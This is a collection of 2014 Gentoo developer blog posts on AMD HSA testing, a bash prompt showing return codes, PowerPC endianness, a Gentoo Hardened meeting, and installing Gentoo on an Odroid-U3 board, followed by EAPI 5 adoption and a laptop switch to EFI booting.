[    2.812695] [drm]   DDC: 0x6540 0x6540 0x6544 0x6544 0x6548 0x6548 0x654c 0x654c
[    2.812695] [drm]   Encoders:
[    2.812696] [drm]     CRT1: INTERNAL_UNIPHY3
[    2.812697] [drm]     CRT1: NUTMEG
[    2.924144] [drm] fb mappable at 0xC1488000
[    2.924147] [drm] vram apper at 0xC0000000
[    2.924149] [drm] size 9216000
[    2.924150] [drm] fb depth is 24
[    2.924151] [drm]    pitch is 7680
[    2.924428] fbcon: radeondrmfb (fb0) is primary device
[    2.994293] Console: switching to colour frame buffer device 240x75
[    2.999979] radeon 0000:00:01.0: fb0: radeondrmfb frame buffer device
[    2.999981] radeon 0000:00:01.0: registered panic notifier
[    3.008270] ACPI Error: [\_SB_.ALIB] Namespace lookup failure, AE_NOT_FOUND (20131218/psargs-359)
[    3.008275] ACPI Error: Method parse/execution failed [\_SB_.PCI0.VGA_.ATC0] (Node ffff88042f04f028), AE_NOT_FOUND (20131218/psparse-536)
[    3.008282] ACPI Error: Method parse/execution failed [\_SB_.PCI0.VGA_.ATCS] (Node ffff88042f04f000), AE_NOT_FOUND (20131218/psparse-536)
[    3.509149] kfd: kernel_queue sync_with_hw timeout expired 500
[    3.509151] kfd: wptr: 8 rptr: 0
[    3.509243] kfd kfd: added device (1002:1313)
[    3.509248] [drm] Initialized radeon 2.37.0 20080528 for 0000:00:01.0 on minor 0
It is recommended to add udev rules:
# cat /etc/udev/rules.d/kfd.rules 
KERNEL=="kfd", MODE="0666"
(this might not be the best way to do it, but we're just here to test if things work at all ...)

AMD has provided a small shell script to test if things work:
# ./kfd_check_installation.sh 

Kaveri detected:............................Yes
Kaveri type supported:......................Yes
Radeon module is loaded:....................Yes
KFD module is loaded:.......................Yes
AMD IOMMU V2 module is loaded:..............Yes
KFD device exists:..........................Yes
KFD device has correct permissions:.........Yes
Valid GPU ID is detected:...................Yes

Can run HSA.................................YES
So that's a good start. Then you need some support libs ... which I've ebuildized in the most horrible ways
These ebuilds can be found here

Since there's at least one binary file with undeclared license and some other inconsistencies I cannot recommend installing these packages right now.
And of course I hope that AMD will release the sourcecode of these libraries ...

There's an example "vector_copy" program included; it mostly works, but appears to go into an infinite loop. Output looks like this:
# ./vector_copy 
Initializing the hsa runtime succeeded.
Calling hsa_iterate_agents succeeded.
Checking if the GPU device is non-zero succeeded.
Querying the device name succeeded.
The device name is Spectre.
Querying the device maximum queue size succeeded.
The maximum queue size is 131072.
Creating the queue succeeded.
Creating the brig module from vector_copy.brig succeeded.
Creating the hsa program succeeded.
Adding the brig module to the program succeeded.
Finding the symbol offset for the kernel succeeded.
Finalizing the program succeeded.
Querying the kernel descriptor address succeeded.
Creating a HSA signal succeeded.
Registering argument memory for input parameter succeeded.
Registering argument memory for output parameter succeeded.
Finding a kernarg memory region succeeded.
Allocating kernel argument memory buffer succeeded.
Registering the argument buffer succeeded.
Dispatching the kernel succeeded.
^C
Big thanks to AMD for giving us geeks some new toys to work with, and I hope it becomes a reliable and efficient platform to do some epic numbercrunching :)

August 30, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Showing return code in PS1 (August 30, 2014, 23:14 UTC)

If you do daily management on Unix/Linux systems, then checking the return code of a command is something you’ll do often. If you do SELinux development, you might not even notice that a command has failed without checking its return code, as policies might prevent the application from showing any output.

To make sure I don’t miss out on application failures, I wanted to add the return code of the last executed command to my PS1 (i.e. the prompt displayed on my terminal).
I wasn’t able to add it to the prompt easily – in fact, I had to use a bash feature called the prompt command.

When the PROMPT_COMMAND variable is defined, bash will execute its content (which I declare as a function) to generate the prompt. Inside the function, I obtain the return code of the last command ($?) and then add it to the PS1 variable. This results in the following code snippet inside my ~/.bashrc:

export PROMPT_COMMAND=__gen_ps1
 
function __gen_ps1() {
  local EXITCODE="$?";
  # Enable colors for ls, etc.  Prefer ~/.dir_colors #64489
  if type -P dircolors >/dev/null ; then
    if [[ -f ~/.dir_colors ]] ; then
      eval $(dircolors -b ~/.dir_colors)
    elif [[ -f /etc/DIR_COLORS ]] ; then
      eval $(dircolors -b /etc/DIR_COLORS)
    fi
  fi
 
  if [[ ${EUID} == 0 ]] ; then
    PS1="RC=${EXITCODE} \[\033[01;31m\]\h\[\033[01;34m\] \W \$\[\033[00m\] "
  else
    PS1="RC=${EXITCODE} \[\033[01;32m\]\u@\h\[\033[01;34m\] \w \$\[\033[00m\] "
  fi
}

With it, my prompt now nicely shows the return code of the last executed command. Neat.

Edit: Sean Patrick Santos showed me my utter failure in that this can be accomplished with the PS1 variable directly, without the overhead of PROMPT_COMMAND. Just make sure to properly escape the $ sign, which I of course forgot in my late-night experiments :-(.

Luca Barbato a.k.a. lu_zero (homepage, bugs)
PowerPC is back (and little endian) (August 30, 2014, 17:32 UTC)

Yesterday I fixed a PowerPC issue that had been there for ages. It is an endianness issue, and it is (funnily enough) on the little-endian flavour of the architecture.

PowerPC

I have some ties with this architecture, since my interest in it (and in Altivec/VMX in particular) is what made me start contributing to MPlayer while fixing issues on Gentoo, and from there hack on the FFmpeg of the time, meet the VLC people, decide to part ways with Michael Niedermayer and, with the other main contributors of FFmpeg, create Libav. Quite a long way back in time.

Big endian, Little Endian

It is a bit surprising that IBM decided to go little-endian (big endian is MUCH nicer for I/O processing such as networking), but they probably have their reasons.

PowerPC has traditionally been bi-endian, with the ability to switch between the two on the fly (which made foreign-endian simulators slightly less annoying to manage), but the primary endianness had always been big.

This brings us to a quite interesting problem: some, if not most, of the existing PowerPC code had been written with big endian in mind. Luckily, since most of that code uses C intrinsics (bless whoever made the Altivec intrinsics not as terrible as the other ones around), it won’t be that hard to recycle most of it.

More will follow.

August 29, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Gentoo Hardened august meeting (August 29, 2014, 14:43 UTC)

Another month has passed, so we had another online meeting to discuss the progress within Gentoo Hardened.

Lead elections

The yearly lead elections within Gentoo Hardened were up again. Zorry (Magnus Granberg) was re-elected as project lead, so he doesn’t need to update his LinkedIn profile yet ;-)

Toolchain

blueness (Anthony G. Basile) has been working on the uclibc stages for some time. Due to the configurable nature of these setups, many /etc/portage files were provided as part of the stages, which shouldn’t happen. Work is under way to fix this.

For the musl setup, blueness is also rebuilding the stages to use a symbolic link to the dynamic linker (/lib/ld-linux-arch.so) as recommended by the musl maintainers.

Kernel and grsecurity with PaX

A bug has been submitted showing that large binaries (in the bug, a chrome binary with debug information weighing in at more than 2 GB) cannot be pax-marked, with paxctl informing the user that the file is too big. The problem only occurs when the PaX marks are stored in the ELF binary itself (as the tool mmaps the binary); users of extended-attribute-based PaX markings do not have this problem. blueness is working on making things a bit more intelligent, and on fixing this.
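
For comparison, the extended-attribute route looks roughly like this (a sketch; the path and flag string are made up, and it of course requires a kernel and filesystem with support for PaX extended attributes):

# store the PaX flags in the user.pax.flags extended attribute instead of
# the ELF header (here a lowercase "m" disables MPROTECT for this one binary)
setfattr -n user.pax.flags -v "m" /usr/bin/some-huge-binary
getfattr -n user.pax.flags /usr/bin/some-huge-binary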

SELinux

I have been making a few changes to the SELinux setup:

  • The live ebuilds (those with version 9999, which use the repository policy rather than snapshots of the policies) are now used as the “master” for releases: the ebuilds can just be copied to the right version when a release is made. The release script inside the repository has been adjusted to reflect this as well.
  • The SELinux eclass now supports two variables, SELINUX_GIT_REPO and SELINUX_GIT_BRANCH, which allow users to use their own repository, and developers to work in specific branches together. By setting the right values in the user’s make.conf, switching policy repositories or branches is now a breeze (see the sketch after this list).
  • Another change in the SELinux eclass is that, after the installation of SELinux policies, we will check the reverse dependencies of the policy package and relabel the files of these packages. This allows us to only have RDEPEND dependencies towards the SELinux policy packages (if the application itself does not otherwise link with libselinux), making the dependency tree within the package manager more correct. We still need to update these packages to drop the DEPEND dependency, which is something we will focus on in the next few months.
  • In order to support improved cooperation between SELinux developers in the Gentoo Hardened team – perfinion (Jason Zaman) is in the queue for becoming a new developer in our midst – a coding style for SELinux policies is being drafted. This is of course based on the coding style of the reference policy, but with some Gentoo-specific improvements and more clarifications.
  • perfinion has been working on improving the SELinux support in OpenRC (release 0.13 and higher), making some of the additions that we had to make in the past – such as the selinux_gentoo init script – obsolete.
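
As an illustration of the new eclass variables, the override could look something like this (a sketch; the variable names are the ones the eclass introduces, while the repository URL and branch name are placeholders):

# /etc/portage/make.conf
SELINUX_GIT_REPO="https://example.com/my-hardened-refpolicy.git"
SELINUX_GIT_BRANCH="my-feature-branch"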

The meeting also discussed a few bugs in more detail, but if you really want to know, just hang on and wait for the IRC logs ;-) Other usual sections (system integrity and profiles) did not have any notable topics to describe.

August 25, 2014
Matthew Thode a.k.a. prometheanfire (homepage, bugs)
Gentoo on the Odroid-U3 (August 25, 2014, 05:00 UTC)

Arm cross compiler setup and stuffs

This will set up a way to compile things for arm on your native system (amd64 for me)

emerge dev-embedded/u-boot-tools sys-devel/crossdev
crossdev -S -s4 -t armv7a-hardfloat-linux-gnueabi

Building the kernel

This assumes you have kernel sources; I'm testing 3.17-rc2 since support for the odroid-u3 just landed upstream.

Also, I tend to build without modules, so keep that in mind.

# get the base config (for me, on an odroid-u3)
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make exynos_defconfig
# change it to add what I want/need
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make menuconfig
# build the kernel
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make -j10

Setting up the SD Card

I tend to be generous: 10M for the bootloader.

parted /dev/sdb mklabel msdos y
parted /dev/sdb mkpart p fat32 10M 200M
parted /dev/sdb mkpart p 200M 100%
parted /dev/sdb toggle 1 boot

mkfs.vfat /dev/sdb1
mkfs.ext4 /dev/sdb2

Building uboot

This may differ between boards, but it should generally look like the following (I hear vanilla u-boot works now).

I used the odroid-v2010.12 branch. One thing to note is that if u-boot sees a zImage on the boot partition it will ONLY use that, which is kind of annoying.

git clone git://github.com/hardkernel/u-boot.git
cd u-boot
sed -i -e "s/soft-float/float-abi=hard -mfpu=vfpv3/g" arch/arm/cpu/armv7/config.mk
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make smdk4412_config
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make -j1
sudo "sh /home/USER/dev/arm/u-boot/sd_fuse/sd_fusing.sh /dev/sdb"

Copying the kernel/userland

sudo -i
mount /dev/sdb2 /mnt/gentoo
mount /dev/sdb1 /mnt/gentoo/boot
cp /home/USER/dev/linux/arch/arm/boot/dts/exynos4412-odroidu3.dtb /mnt/gentoo/boot/
cp /home/USER/dev/linux/arch/arm/boot/zImage /mnt/gentoo/boot/kernel-3.17-rc2.raw
cd /mnt/gentoo/boot
cat kernel-3.17-rc2.raw exynos4412-odroidu3.dtb > kernel-3.17-rc2

tar -xf /tmp/stage3-armv7a_hardfp-hardened-20140627.tar.bz2 -C /mnt/gentoo/

Setting up userland

I tend to just copy or generate a shadow file and overwrite the root entry in the target's /etc/shadow so I can log in... (a sketch of what I mean follows below)

The rest of the setup happens once booted.
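
Roughly like this (the openssl invocation and the sed substitution are just one way to do it; adjust the mount point and hash type to taste):

HASH=$(openssl passwd -1)   # prompts for a password, prints a crypt(3) hash
sed -i "s|^root:[^:]*:|root:${HASH}:|" /mnt/gentoo/etc/shadow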

Setting up the bootloader

put this in /mnt/gentoo/boot/boot.txt

setenv initrd_high "0xffffffff"
setenv fdt_high "0xffffffff"
setenv fb_x_res "1920"
setenv fb_y_res "1080"
setenv hdmi_phy_res "1080"
setenv bootcmd "fatload mmc 0:1 0x40008000 kernel-3.17-rc2; bootm 0x40008000"
setenv bootargs "console=tty1 console=ttySAC1,115200n8 fb_x_res=${fb_x_res} fb_y_res=${fb_y_res} hdmi_phy_res=${hdmi_phy_res} root=/dev/mmcblk0p2 rootwait ro mem=2047M"
boot

and run this

mkimage -A arm -T script -C none -n "Boot.scr for odroid-u3" -d boot.txt boot.scr

That should do it :D

I used steev (a fellow Gentoo dev) and http://www.funtoo.org/ODROID_U2 as sources.

August 22, 2014
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

As of today, more than 50% of the 37527 ebuilds in the Gentoo portage tree use the newest ebuild API (EAPI) version, EAPI=5!
The details of the various EAPIs can be found in the package manager specification (PMS); the most notable new feature of EAPI 5, which has sped up its adoption a lot, is the introduction of so-called subslots. A package A can declare a subslot, and another package B that depends on it can specify that it needs to be rebuilt when the subslot of A changes. This leads to much more elegant solutions for many of the link or installation path problems that revdep-rebuild, emerge @preserved-rebuild, or e.g. perl-cleaner try to solve... Another useful new feature in EAPI=5 is the masking of use flags specifically for stable-marked ebuilds.
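
In ebuild terms the subslot mechanism boils down to something like this (a sketch; the package name and subslot value are made up):

# the library package declares a subslot, e.g. tracking its soname:
SLOT="0/5.2"
# a consumer uses the := slot operator to be rebuilt whenever the
# subslot of the installed dev-libs/libfoo changes:
RDEPEND="dev-libs/libfoo:="
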
You can follow the adoption of EAPIs in the portage tree on an automatically updated graph page.

August 19, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Switching to new laptop (August 19, 2014, 20:11 UTC)

I’m slowly but surely starting to switch to a new laptop. The old one hasn’t completely died (yet), but I had to force its CPU frequency to the lowest setting or the CPU would overheat (and the system would suddenly shut down due to heat issues), and the connection between the battery and the laptop fails (so even a new battery didn’t help), meaning I couldn’t really use it as a laptop anymore… well, let’s say the new laptop is welcome ;-)

Building Gentoo isn’t an issue (having only a few hours per day to work on it is), and while I’m at it, I’m also experimenting with EFI (currently still without secure boot, but with EFI) and such. Considering that the Gentoo Handbook needs quite a few updates (and I’m thinking of doing more than just small updates), knowing how EFI works is a Good Thing™.

For those interested – the EFI stub kernel instructions in the article on the wiki, and also in Greg’s wonderful post on booting a self-signed Linux kernel (which I will do later), work pretty well. I didn’t try out the “Adding more kernels” section in it, as I need to be able to (sometimes) edit the boot options (which isn’t easy to accomplish with EFI stub kernels, afaics). So I installed Gummiboot (and created a wiki article on it).
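
For reference, a Gummiboot loader entry is just a small text file on the EFI system partition; something along these lines (a sketch: the kernel file name, root device and options are placeholders for whatever your install uses):

# /boot/loader/entries/gentoo.conf
title    Gentoo Linux
linux    /kernel-3.16.1-gentoo.efi
options  root=/dev/sda2 ro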

Lots of things still planned, so little time. But at least building chromium is now a bit faster – instead of 5 hours and 16 minutes, I can now enjoy the newer versions after a little less than 40 minutes.